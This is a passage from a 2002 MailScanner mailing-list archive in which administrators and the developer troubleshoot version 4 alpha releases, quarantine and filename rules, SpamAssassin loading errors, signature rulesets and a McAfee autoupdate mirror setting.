want to put you and your customers at risk due to some screw-up I have made in the re-write. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mike at CAMAROSS.NET Sun Sep 22 23:53:37 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test In-Reply-To: <028401c26288$24cb1b00$6401a8c0@matthewmpqowmc> Message-ID: I did NOT remove the RPM of 3.22-14 because I wasn't sure if it would mess up any of the necessary perl modules that are installed along with the RPM. I haven't had any problems yet! -----Original Message----- From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On Behalf Of Matt Sent: Sunday, September 22, 2002 5:34 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Second speed test > >When can we expect a RPM release? > > When I'm quite happy that it works as well as I can get it to. Still > finding bugs at the moment. > I have to assume that people needing an rpm aren't as experienced as those > who don't. Fault-finding comes with experience, so I only want the > most-experienced people to be trying it now. > > Hope you understand, it's for your benefit (and that of your customers > too). I hope I'm not being seen as condescending in any way, I'm just > trying to protect everyone involved. I agree but am waiting patiently for all the new bells and whistles. I have installed applications such as MRTG without an RPM but if all it takes is a week or so of patiance, I'll wait. RPM's also have an uninstall option as well I beleive. Should the version 3 Mailscanner rpm be removed before version 4 goes in? Matt From jim at ENTROPHY-FREE.NET Sun Sep 22 23:59:19 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:43 2006 Subject: Virii, bad file names, and quarantine in V4 Message-ID: <1032735559.10742.92.camel@chaos.entrophy-free.net> It looks like something isn't working the way I'd think it should. With "Quarantine Infections = no" I'm seeing those things that violate the Outlook security check and infected attachments being quarantined. What I'd like to be able to do is to cause those attachments identified as a virus by the virus scanner simply be deleted and things that violate the file name rules be quarantined. According to the conf file it would seen that this should be possible via a ruleset, but I haven't a clue as to what that ruleset would look like (and yeah, I've looked at the rules/README & rules/EXAMPLES) There's no way that I ever want to give a user a file out of the quarantine area that is known to be infected, but they may have a valid use for files that fail the file name check. Short of virus scanning everything in the quarantine dir I don't see how I'd know which was which. -- The instructions said to use Windows 98 or better, so I installed RedHat. From jim at ENTROPHY-FREE.NET Mon Sep 23 00:35:59 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:43 2006 Subject: V4 releases In-Reply-To: <5.1.0.14.2.20020922233606.03337660@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020922133128.032d9cb8@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020922233606.03337660@imap.ecs.soton.ac.uk> Message-ID: <1032737760.10742.96.camel@chaos.entrophy-free.net> On Sun, 2002-09-22 at 17:38, Julian Field wrote: > Point of note: I'm not going to do an announcement email for every V4 > version at the moment, not until it's settled down some more. So you will > need to keep an eye on the downloads page if you are trying out V4. > > I'm currently at 4.00.0a4. V4.00.0a3 looks to be pretty good so far. With the exception of the new MS security violation detections it is duplicating what I get on my sample set as far as Spam virus detection. -- The instructions said to use Windows 98 or better, so I installed RedHat. From hciss at HCIWS.COM Mon Sep 23 01:08:42 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:43 2006 Subject: Virus Sent From My Subnet References: <5.1.0.14.2.20020920190113.036f5d48@imap.ecs.soton.ac.uk> Message-ID: <000d01c26295$6375aa20$6701a8c0@matthew> Will this be a possible config option in version 4? This does solve the problem quite nicely. Matt > Would addint the IP address to the contents of the virus notice do the job? > Then you can just filter all messages containing an IP address you own into > another mailbox. That should be an easy change. Here are patches for V4 and > the latest V3 (though you should be able to apply it to pretty old versions > too). From mrlynx at LAING.E-TARLAC.COM Mon Sep 23 02:09:56 2002 From: mrlynx at LAING.E-TARLAC.COM (Joseph C. Bautista -mrlynx-) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test In-Reply-To: <5.1.0.14.2.20020922205947.023882b8@imap.ecs.soton.ac.uk> Message-ID: On Sun, 22 Sep 2002, Julian Field wrote: Oh gosh! When the rpm for i386 be available? > I have fixed a couple of bugs today, and it's now even faster. > Same hardware as before, same configuration, same dataset. > > 4.00.0a3 processed 20,000 messages in 104.6 minutes. > This scales up to 275,334 messages per day. > > So 4.00.0a3 ran 4.0 times fast than version 3. > > Vrooommm, Vrrrooommmmm! :-) > > At 15:02 12/09/2002, you wrote: > >This test was done on a dual-CPU 1GHz Pentium 3 box with 512Mb RAM. > >It's not very fast by modern standards but was quite nice when I bought it > >a few years ago... > > > >Version 3 processed 20,000 messages in 415.5 minutes. > >This scales up to 69314 messages per day. > > > >Version 4 processes 20,000 messages in 130.3 minutes. > >This scales up to 221028 messages per day. > > > >So version 4 ran 3.2 times faster than version 3 on the same hardware, with > >the same MailScanner configuration, with the same 20,000 messages. > > > >Vrrrooooommmmmm........ > >-- > >Julian Field Teaching Systems Manager > >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > >Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > -- - \|/ - (@ @) +----------oOO---------(_)------------+ | Mr. Joseph C. Bautista | | NOC, e-Tarlac.com | | email add: mrlynx@e-tarlac.com | | URL: http://www.e-tarlac.com | +------------------------oOO----------+ |__|__| | | | | ooO Ooo -- It takes more learning, before you learn how little you've learned -- From mailscanner at ecs.soton.ac.uk Mon Sep 23 09:40:01 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: Virii, bad file names, and quarantine in V4 In-Reply-To: <1032735559.10742.92.camel@chaos.entrophy-free.net> Message-ID: <5.1.0.14.2.20020923093056.024b4b80@imap.ecs.soton.ac.uk> At 23:59 22/09/2002, you wrote: >It looks like something isn't working the way I'd think it should. With >"Quarantine Infections = no" I'm seeing those things that violate the >Outlook security check and infected attachments being quarantined. Thanks for spotting that. Fixed. >What I'd like to be able to do is to cause those attachments identified >as a virus by the virus scanner simply be deleted and things that >violate the file name rules be quarantined. According to the conf file >it would seen that this should be possible via a ruleset, but I haven't >a clue as to what that ruleset would look like (and yeah, I've looked at >the rules/README & rules/EXAMPLES) You currently can't do this. I would be very tempted to say that you should scan anything in the quarantine before giving it out to users anyway, just to be on the safe side. What does anyone else think? >There's no way that I ever want to give a user a file out of the >quarantine area that is known to be infected, but they may have a valid >use for files that fail the file name check. Short of virus scanning >everything in the quarantine dir I don't see how I'd know which was >which. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 23 09:42:52 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: Virus Sent From My Subnet In-Reply-To: <000d01c26295$6375aa20$6701a8c0@matthew> References: <5.1.0.14.2.20020920190113.036f5d48@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020923094048.0247e2f0@imap.ecs.soton.ac.uk> At 01:08 23/09/2002, you wrote: >Will this be a possible config option in version 4? This does solve the >problem quite nicely. Is it really worth making an extra config item for it? Why not just do it for all the "notices"? It doesn't get sent to users, only sysadmins, so a bit of extra info shouldn't do any harm. > > Would addint the IP address to the contents of the virus notice do the >job? > > Then you can just filter all messages containing an IP address you own >into > > another mailbox. That should be an easy change. Here are patches for V4 >and > > the latest V3 (though you should be able to apply it to pretty old >versions > > too). -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 23 09:43:18 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test In-Reply-To: References: <5.1.0.14.2.20020922205947.023882b8@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020923094306.024b3358@imap.ecs.soton.ac.uk> At 02:09 23/09/2002, you wrote: >On Sun, 22 Sep 2002, Julian Field wrote: > >Oh gosh! > >When the rpm for i386 be available? Please see my earlier comments on this thread. > > I have fixed a couple of bugs today, and it's now even faster. > > Same hardware as before, same configuration, same dataset. > > > > 4.00.0a3 processed 20,000 messages in 104.6 minutes. > > This scales up to 275,334 messages per day. > > > > So 4.00.0a3 ran 4.0 times fast than version 3. > > > > Vrooommm, Vrrrooommmmm! :-) > > > > At 15:02 12/09/2002, you wrote: > > >This test was done on a dual-CPU 1GHz Pentium 3 box with 512Mb RAM. > > >It's not very fast by modern standards but was quite nice when I bought it > > >a few years ago... > > > > > >Version 3 processed 20,000 messages in 415.5 minutes. > > >This scales up to 69314 messages per day. > > > > > >Version 4 processes 20,000 messages in 130.3 minutes. > > >This scales up to 221028 messages per day. > > > > > >So version 4 ran 3.2 times faster than version 3 on the same hardware, > with > > >the same MailScanner configuration, with the same 20,000 messages. > > > > > >Vrrrooooommmmmm........ > > >-- > > >Julian Field Teaching Systems Manager > > >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > > >Tel. 023 8059 2817 University of Southampton > > > Southampton SO17 1BJ > > > > -- > > Julian Field Teaching Systems Manager > > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > > Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > > > >-- >- \|/ - > (@ @) >+----------oOO---------(_)------------+ > | Mr. Joseph C. Bautista | > | NOC, e-Tarlac.com | > | email add: mrlynx@e-tarlac.com | > | URL: http://www.e-tarlac.com | >+------------------------oOO----------+ > |__|__| > | | | | > ooO Ooo > >-- It takes more learning, before you learn > how little you've learned -- -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at BARENDSE.TO Mon Sep 23 09:44:54 2002 From: mailscanner at BARENDSE.TO (Remco Barendse) Date: Thu Jan 12 21:15:43 2006 Subject: CLSID extension vulnerability test FAILED? In-Reply-To: <5.1.0.14.2.20020922133128.032d9cb8@imap.ecs.soton.ac.uk> Message-ID: Hi! I have just installed the latest mailscanner and running the GFI test all messages but 1 are filtered. The CLSID extension vulnerability test message is delivered without filtering whereas the same message butspecific for Outlook 2002/XP is filtered out correctly. Is this a bug or should I have configured something?? Remco From mailscanner at ecs.soton.ac.uk Mon Sep 23 10:00:11 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: CLSID extension vulnerability test FAILED? In-Reply-To: References: <5.1.0.14.2.20020922133128.032d9cb8@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020923095652.023a3fc0@imap.ecs.soton.ac.uk> At 09:44 23/09/2002, you wrote: >Hi! > >I have just installed the latest mailscanner and running the GFI test all >messages but 1 are filtered. > >The CLSID extension vulnerability test message is delivered without >filtering whereas the same message butspecific for Outlook 2002/XP is >filtered out correctly. > >Is this a bug or should I have configured something?? It's dependent upon your filename.rules.conf. If there's a filename.rules.conf.rpmnew file, then make sure your filename.rules.conf file has all the CLSID filename checks in it. Sounds like your filename.rules.conf is a bit old. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From LISTSERV at JISCMAIL.AC.UK Mon Sep 23 11:25:03 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:43 2006 Subject: MAILSCANNER: a.phillips@DNMI.NO requested to join Message-ID: <200209231025.LAA12958@magpie.ecs.soton.ac.uk> Mon, 23 Sep 2002 11:25:03 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Adrian Phillips . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER a.phillips@DNMI.NO Adrian Phillips The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+a.phillips%40DNMI.NO+Adrian+Phillips&L=MAILSCANNER ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Mon, 23 Sep 2002 11:25:02 +0100 Received: from smtp1.oslo.dnmi.no (smtp1.oslo.dnmi.no [157.249.32.202]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8NAOxr08852 for ; Mon, 23 Sep 2002 11:25:00 +0100 Received: from amavis by smtp1.oslo.dnmi.no with scanned-ok (Exim 3.35 #1) id 17tQOb-0007Se-00 (Debian); Mon, 23 Sep 2002 10:24:53 +0000 Received: from freeze.oslo.dnmi.no [157.249.16.34] (mail) by smtp1.oslo.dnmi.no with esmtp (Exim 3.35 #1) id 17tQOb-0007SV-00 (Debian); Mon, 23 Sep 2002 10:24:53 +0000 Received: from uucp by freeze.oslo.dnmi.no with spam-scanned (Exim 3.35 #1) id 17tQOc-0000By-00 for LISTSERV@jiscmail.ac.uk; Mon, 23 Sep 2002 12:24:54 +0200 Received: from tandem by freeze.oslo.dnmi.no with local (Exim 3.35 #1) id 17tQOb-0000Bv-00 for LISTSERV@JISCMAIL.AC.UK; Mon, 23 Sep 2002 12:24:53 +0200 To: "L-Soft list server at JISCMAIL (1.8e)" Subject: Re: Command confirmation request (87371547) References: From: Adrian Phillips In-Reply-To: Date: 23 Sep 2002 12:24:53 +0200 Message-ID: Lines: 2 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: "Adrian Phillips,,," X-Spam-Status: No, hits=-3.4 required=5.0 tests=IN_REP_TO version=2.31 X-Spam-Level: X-Virus-Scanned: by AMaViS snapshot-20010714 From joan.bryan at KCL.AC.UK Mon Sep 23 11:58:21 2002 From: joan.bryan at KCL.AC.UK (Joan Bryan) Date: Thu Jan 12 21:15:43 2006 Subject: Files named 'store' Message-ID: Hello I recently upgraded mailscanner to 3.22-14 (running without spam checks) and I am finding that mailscanner is quarantining any file attachment named 'store.XXX' (where XXX is any extension or none). 'store' does appear hard coded in several files. Thanks very much. Joan Joan Bryan Information Systems King's College London 020 7848 2671 mailto:joan.bryan@kcl.ac.uk From chicks at CHICKS.NET Mon Sep 23 12:29:44 2002 From: chicks at CHICKS.NET (Christopher Hicks) Date: Thu Jan 12 21:15:43 2006 Subject: Second speed test In-Reply-To: Message-ID: On Sun, 22 Sep 2002, Mike Kercher wrote: > I did NOT remove the RPM of 3.22-14 because I wasn't sure if it would > mess up any of the necessary perl modules that are installed along with > the RPM. I haven't had any problems yet! The rpm uninstall doesn't effect the perl modules installed. In general, rpm doesn't ever say "do you want to uninstall these modules that you only installed to make program Q work?". If you've forgotten it isn't going to remind you. -- Camels may be nasty beasts, but they're the only way to get through the desert. From mailscanner at ecs.soton.ac.uk Mon Sep 23 12:27:51 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: Files named 'store' In-Reply-To: Message-ID: <5.1.0.14.2.20020923122635.04f23ec0@imap.ecs.soton.ac.uk> Can anyone corroborate this one for me please? Also, Joan, what version were you using before you upgraded? At 11:58 23/09/2002, you wrote: >Hello > >I recently upgraded mailscanner to 3.22-14 (running without spam checks) and >I am finding that mailscanner is quarantining any file attachment named >'store.XXX' (where XXX is any extension or none). 'store' does appear hard >coded in several files. > >Thanks very much. > >Joan -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mike at ZANKER.ORG Mon Sep 23 12:37:44 2002 From: mike at ZANKER.ORG (Mike Zanker) Date: Thu Jan 12 21:15:43 2006 Subject: Files named 'store' In-Reply-To: <5.1.0.14.2.20020923122635.04f23ec0@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020923122635.04f23ec0@imap.ecs.soton.ac.uk> Message-ID: <169039984.1032784664@mallard.open.ac.uk> On 23 September 2002 12:27 +0100 Julian Field wrote: > Can anyone corroborate this one for me please? Same version works fine here. I've tried store.txt and store.gif without any problems. Mike -- Mike Zanker Northampton, UK PGP Public Key: pgp@zanker.org From paul_houselander at BRISTOL-LEA.ORG.UK Mon Sep 23 12:49:28 2002 From: paul_houselander at BRISTOL-LEA.ORG.UK (Paul Houselander) Date: Thu Jan 12 21:15:43 2006 Subject: Version 4.00.0a4 Message-ID: <016c01c262f7$4637c760$7b10140a@education.bcc.lan> Just trying it out on a totally fresh server. Looks really good, comments are 1. Sophos.install - does not point to the new location for sophos-wrapper and sophos-autoupdate scripts. 2. If "Use SpamAssassin = no" and "Load SpamAssassin = yes" in mailscanner.conf, it does try to use spamassasin. I would have expected the "Use SpamAssassin = no" to have precedence. Im very interested in the ability to do different signatures for different domains, and will be trying that out next, I was looking at the example and it seemed to apply for outgoing mail only e.g. From: *@domain1.com /opt/MailScanner/etc/reports/domain1.sig.txt From: *@domain2.com /opt/MailScanner/etc/reports/domain2.sig.txt Does this work for for To: as well? e.g. To: *@domain1.com /opt/MailScanner/etc/reports/domain1.sig.txt To: *@domain2.com /opt/MailScanner/etc/reports/domain2.sig.txt Thanks Paul Houselander Network & Intranet Support Officer Bristol City Council -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020923/38a1c7c1/attachment.html From joan.bryan at KCL.AC.UK Mon Sep 23 13:08:33 2002 From: joan.bryan at KCL.AC.UK (Joan Bryan) Date: Thu Jan 12 21:15:43 2006 Subject: Files named 'store' In-Reply-To: <5.1.0.14.2.20020923122635.04f23ec0@imap.ecs.soton.ac.uk> Message-ID: Hi I was using 3.22-9. Joan Joan Bryan Information Systems King's College London 020 7848 2671 mailto:joan.bryan@kcl.ac.uk > -----Original Message----- > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > Behalf Of Julian Field > Sent: 23 September 2002 12:28 > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: Files named 'store' > > > Can anyone corroborate this one for me please? > > Also, Joan, what version were you using before you upgraded? > > At 11:58 23/09/2002, you wrote: > >Hello > > > >I recently upgraded mailscanner to 3.22-14 (running without spam > checks) and > >I am finding that mailscanner is quarantining any file attachment named > >'store.XXX' (where XXX is any extension or none). 'store' does > appear hard > >coded in several files. > > > >Thanks very much. > > > >Joan > > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > From mailscanner at ecs.soton.ac.uk Mon Sep 23 14:08:34 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: Users' Comments Book Message-ID: <5.1.0.14.2.20020923140540.04eda120@imap.ecs.soton.ac.uk> I have just installed a guestbook on the web site, so if some if you could add some comments to it to let the rest of the world know what you think of MailScanner (and my support efforts) it would be greatly appreciated. I intend it to become a place where potential new users can go to find out about other people already using it, and what they think of it. It's not a place to post feature requests or support questions. It's at http://www.sng.ecs.soton.ac.uk/mailscanner/book (linked straight off www.mailscanner.info) Thanks folks! -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 23 14:22:39 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:43 2006 Subject: Version 4.00.0a4 In-Reply-To: <016c01c262f7$4637c760$7b10140a@education.bcc.lan> Message-ID: <5.1.0.14.2.20020923141642.04906840@imap.ecs.soton.ac.uk> At 12:49 23/09/2002, you wrote: >Just trying it out on a totally fresh server. > >Looks really good, comments are > >1. Sophos.install - does not point to the new location for sophos-wrapper >and sophos-autoupdate scripts. Fixed. >2. If "Use SpamAssassin = no" and "Load SpamAssassin = yes" in >mailscanner.conf, it does try to use spamassasin. I would have expected >the "Use SpamAssassin = no" to have precedence. Does it try to use it, or just try to load it? Working out whether "Use SpamAssassin" is yes or no is no longer easy because it could be a ruleset rather than a simple value. That's why I put in the "Load SpamAssassin" option in, as that has to be just yes or no. >Im very interested in the ability to do different signatures for different >domains, and will be trying that out next, I was looking at the example >and it seemed to apply for outgoing mail only e.g. > > From: *@domain1.com > /opt/MailScanner/etc/reports/domain1.sig.txt > From: *@domain2.com > /opt/MailScanner/etc/reports/domain2.sig.txt > >Does this work for for To: as well? e.g. > > To: *@domain1.com > /opt/MailScanner/etc/reports/domain1.sig.txt > To: *@domain2.com > /opt/MailScanner/etc/reports/domain2.sig.txt You can have "from", "to" or "fromto" or "tofrom" etc in the first field. It just looks at the first word for the word "from" and for the word "to" so if you want both then you can combine them how you like. So I would do FromTo: *@domain1.com /opt/MailScanner/etc/reports/domain1.sig.txt FromTo: *@domain2.com /opt/MailScanner/etc/reports/domain2.sig.txt Don't forget to set the HTML sigs as well as the txt ones. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020923/f4ae3c51/attachment.html From paul_houselander at BRISTOL-LEA.ORG.UK Mon Sep 23 14:43:28 2002 From: paul_houselander at BRISTOL-LEA.ORG.UK (Paul Houselander) Date: Thu Jan 12 21:15:44 2006 Subject: Version 4.00.0a4 References: <5.1.0.14.2.20020923141642.04906840@imap.ecs.soton.ac.uk> Message-ID: <023501c26307$32b46800$7b10140a@education.bcc.lan> Thanks If I start with "Load SpamAssasin = yes" I get Can't locate Mail/SpamAssassin.pm in @INC (@INC contains: /opt/MailScanner/bin /usr/lib/perl5/5.6.0/i386-linux /usr/lib/perl5/5.6.0 /usr/lib/perl5/site_perl/5.6.0/i386-linux /usr/lib/perl5/site_perl/5.6.0 /usr/lib/perl5/site_perl .) at MailScanner/SA.pm line 69 appearing on the console every 10-15 seconds Also just noticed I got We haven't got any child processes, which isn't right!, No child processes at /opt/MailScanner/bin/mailscanner line 174. We have just tried to reap a process which wasn't one of ours!, No child processes at /opt/MailScanner/bin/mailscanner line 177. Seems fine if I set to "Load SpamAssasin = no" I dont have spamassasin installed. Cheers Paul Houselander Network & Intranet Support Officer Bristol City Council ----- Original Message ----- From: Julian Field To: MAILSCANNER@JISCMAIL.AC.UK Sent: Monday, September 23, 2002 2:22 PM Subject: Re: Version 4.00.0a4 At 12:49 23/09/2002, you wrote: Just trying it out on a totally fresh server. Looks really good, comments are 1. Sophos.install - does not point to the new location for sophos-wrapper and sophos-autoupdate scripts. Fixed. 2. If "Use SpamAssassin = no" and "Load SpamAssassin = yes" in mailscanner.conf, it does try to use spamassasin. I would have expected the "Use SpamAssassin = no" to have precedence. Does it try to use it, or just try to load it? Working out whether "Use SpamAssassin" is yes or no is no longer easy because it could be a ruleset rather than a simple value. That's why I put in the "Load SpamAssassin" option in, as that has to be just yes or no. Im very interested in the ability to do different signatures for different domains, and will be trying that out next, I was looking at the example and it seemed to apply for outgoing mail only e.g. From: *@domain1.com /opt/MailScanner/etc/reports/domain1.sig.txt From: *@domain2.com /opt/MailScanner/etc/reports/domain2.sig.txt Does this work for for To: as well? e.g. To: *@domain1.com /opt/MailScanner/etc/reports/domain1.sig.txt To: *@domain2.com /opt/MailScanner/etc/reports/domain2.sig.txt You can have "from", "to" or "fromto" or "tofrom" etc in the first field. It just looks at the first word for the word "from" and for the word "to" so if you want both then you can combine them how you like. So I would do FromTo: *@domain1.com /opt/MailScanner/etc/reports/domain1.sig.txt FromTo: *@domain2.com /opt/MailScanner/etc/reports/domain2.sig.txt Don't forget to set the HTML sigs as well as the txt ones. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020923/5ca31e47/attachment.html From andersan at LTKALMAR.SE Mon Sep 23 14:44:02 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:44 2006 Subject: Mcafee update prob Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB4A@lkl22.ltkalmar.se> H Sorry for posting again but Im gona show the boss the setup tomorrow and I cant get the autoupdate to work. Spent all morning trying to figure out where the script go bad but my skills is to low =( This is the msg I get: Mcafee update failed: cannot find the the update file, at ./autoupdate line 93 Kind regards /Anders From joan.bryan at KCL.AC.UK Mon Sep 23 14:57:50 2002 From: joan.bryan at KCL.AC.UK (Joan Bryan) Date: Thu Jan 12 21:15:44 2006 Subject: Files named 'store' In-Reply-To: <5.1.0.14.2.20020923122635.04f23ec0@imap.ecs.soton.ac.uk> Message-ID: My apologies I had a missing # on "These are known to be dangerous in almost all cases." in filename.rules.conf Sorry to have troubled you. Joan Joan Bryan Information Systems King's College London 020 7848 2671 mailto:joan.bryan@kcl.ac.uk > From mailscanner at ecs.soton.ac.uk Mon Sep 23 15:01:35 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:44 2006 Subject: Mcafee update prob In-Reply-To: <7B475DC5E9502B4D91EA73C283AE48D70263EB4A@lkl22.ltkalmar.se > Message-ID: <5.1.0.14.2.20020923150016.04edb720@imap.ecs.soton.ac.uk> At 14:44 23/09/2002, you wrote: >H >Sorry for posting again but Im gona show the boss the >setup tomorrow and I cant get the autoupdate to work. >Spent all morning trying to figure out where the script >go bad but my skills is to low =( >This is the msg I get: >Mcafee update failed: cannot find the the update file, at ./autoupdate line >93 I've just tried the US site and it is running extremely slowly, so the FTP commands are timing out. Edit the autoupdate script, and look right near the top of the file. There are a couple of lines that say #my($ftpsite) = 'ftpeur.nai.com'; # Use faster European mirror instead of my($ftpsite) = 'ftp.nai.com'; # busy US site Move the "#" from the first line to the second one, and you'll be using the European mirror site instead, which is working very quickly at the moment. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 23 14:56:51 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:44 2006 Subject: Version 4.00.0a4 In-Reply-To: <023501c26307$32b46800$7b10140a@education.bcc.lan> References: <5.1.0.14.2.20020923141642.04906840@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020923145441.04ac6448@imap.ecs.soton.ac.uk> At 14:43 23/09/2002, you wrote: >Thanks > >If I start with "Load SpamAssasin = yes" I get > >Can't locate Mail/SpamAssassin.pm in @INC (@INC contains: >/opt/MailScanner/bin /usr/lib/perl5/5.6.0/i386-linux /usr/lib/perl5/5.6.0 >/usr/lib/perl5/site_perl/5.6.0/i386-linux /usr/lib/perl5/site_perl/5.6.0 >/usr/lib/perl5/site_perl .) at MailScanner/SA.pm line 69 Have you installed SpamAssassin? If not, then I would fully expect "Load SpamAssassin=yes" to fail. >Also just noticed I got > >We haven't got any child processes, which isn't right!, No child processes >at /opt/MailScanner/bin/mailscanner line 174. >We have just tried to reap a process which wasn't one of ours!, No child >processes at /opt/MailScanner/bin/mailscanner line 177. This is because it is aborting while trying to load SpamAssassin. If you haven't got it installed, then clearly(?) you need to set "Load SpamAssassin = no". >Seems fine if I set to "Load SpamAssasin = no" > >I dont have spamassasin installed. Aha! Don't tell it to load software you haven't got. Surprisingly enough it fails :-) >----- Original Message ----- >From: Julian Field >To: MAILSCANNER@JISCMAIL.AC.UK >Sent: Monday, September 23, 2002 2:22 PM >Subject: Re: Version 4.00.0a4 > >At 12:49 23/09/2002, you wrote: >>Just trying it out on a totally fresh server. >> >>Looks really good, comments are >> >>1. Sophos.install - does not point to the new location for sophos-wrapper >>and sophos-autoupdate scripts. >Fixed. > >>2. If "Use SpamAssassin = no" and "Load SpamAssassin = yes" in >>mailscanner.conf, it does try to use spamassasin. I would have expected >>the "Use SpamAssassin = no" to have precedence. >Does it try to use it, or just try to load it? >Working out whether "Use SpamAssassin" is yes or no is no longer easy >because it could be a ruleset rather than a simple value. That's why I put >in the "Load SpamAssassin" option in, as that has to be just yes or no. > >>Im very interested in the ability to do different signatures for >>different domains, and will be trying that out next, I was looking at the >>example and it seemed to apply for outgoing mail only e.g. >> >> From: *@domain1.com >> /opt/MailScanner/etc/reports/domain1.sig.txt >> From: *@domain2.com >> /opt/MailScanner/etc/reports/domain2.sig.txt >> >>Does this work for for To: as well? e.g. >> >> To: *@domain1.com >> /opt/MailScanner/etc/reports/domain1.sig.txt >> To: *@domain2.com >> /opt/MailScanner/etc/reports/domain2.sig.txt >You can have "from", "to" or "fromto" or "tofrom" etc in the first field. >It just looks at the first word for the word "from" and for the word "to" >so if you want both then you can combine them how you like. So I would do > FromTo: *@domain1.com > /opt/MailScanner/etc/reports/domain1.sig.txt > FromTo: *@domain2.com > /opt/MailScanner/etc/reports/domain2.sig.txt > >Don't forget to set the HTML sigs as well as the txt ones. >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ >-- 